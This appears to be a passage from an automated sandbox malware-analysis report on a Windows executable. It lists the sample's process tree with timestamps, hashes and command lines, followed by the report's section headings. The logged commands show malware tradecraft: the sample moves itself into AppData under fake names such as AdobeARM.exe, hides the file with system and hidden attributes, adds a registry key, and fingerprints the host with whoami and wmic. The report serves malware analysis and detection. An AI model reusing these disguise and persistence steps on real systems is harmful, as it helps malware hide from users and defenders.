Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /Q /C move /Y C:\Windows\acrotray.exe C:\Users\user\AppData\Roaming\Microsoft\sidebar.exe
Imagebase:	0x7ff76d4d0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Start time:	19:11:51
Start date:	14/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Start time:	19:11:52
Start date:	14/01/2022
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg add "HKCU\Software\Trion Softworks" /f
Imagebase:	0x7ff7f2ad0000
File size:	72704 bytes
MD5 hash:	E3DACF0B31841FA02064B4457D44B357
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Start time:	19:11:53
Start date:	14/01/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C whoami
Imagebase:	0x7ff76d4d0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Start time:	19:11:54
Start date:	14/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Start time:	19:11:55
Start date:	14/01/2022
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic cpu get name
Imagebase:	0x7ff6746d0000
File size:	521728 bytes
MD5 hash:	EC80E603E0090B3AC3C1234C2BA43A0F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Start time:	19:11:58
Start date:	14/01/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /Q /C move /Y C:\Windows\acrotray.exe C:\Users\user\AppData\Roaming\Microsoft\AdobeARM.exe
Imagebase:	0x7ff76d4d0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Start time:	19:11:59
Start date:	14/01/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "wmic path win32_VideoController get name"
Imagebase:	0x7ff76d4d0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report 5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Networking:

Spam, unwanted Advertisements and Ransom Demands:

DDoS:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Network Behavior

Network Port Distribution

TCP Packets

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

Start time:	19:12:00
Start date:	14/01/2022
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic path win32_VideoController get name
Imagebase:	0x7ff6746d0000
File size:	521728 bytes
MD5 hash:	EC80E603E0090B3AC3C1234C2BA43A0F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Start time:	19:12:01
Start date:	14/01/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C whoami
Imagebase:	0x7ff76d4d0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Start time:	19:12:02
Start date:	14/01/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "attrib +S +H C:\Users\user\AppData\Roaming\Microsoft\AdobeARM.exe"
Imagebase:	0x7ff76d4d0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Start time:	19:12:03
Start date:	14/01/2022
Path:	C:\Windows\System32\attrib.exe
Wow64 process (32bit):	false
Commandline:	attrib +S +H C:\Users\user\AppData\Roaming\Microsoft\AdobeARM.exe
Imagebase:	0x7ff7e1670000
File size:	21504 bytes
MD5 hash:	FDC601145CD289C6FBC96D3F805F3CD7
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Start time:	19:12:06
Start date:	14/01/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "wmic cpu get name"
Imagebase:	0x7ff76d4d0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Start time:	19:12:07
Start date:	14/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Start time:	19:12:08
Start date:	14/01/2022
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic path win32_VideoController get name
Imagebase:	0x7ff6746d0000
File size:	521728 bytes
MD5 hash:	EC80E603E0090B3AC3C1234C2BA43A0F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Start time:	19:12:10
Start date:	14/01/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "wmic path win32_VideoController get name"
Imagebase:	0x7ff76d4d0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Start time:	19:12:11
Start date:	14/01/2022
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic path win32_VideoController get name
Imagebase:	0x7ff6746d0000
File size:	521728 bytes
MD5 hash:	EC80E603E0090B3AC3C1234C2BA43A0F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Start time:	19:12:13
Start date:	14/01/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C ver
Imagebase:	0x7ff76d4d0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language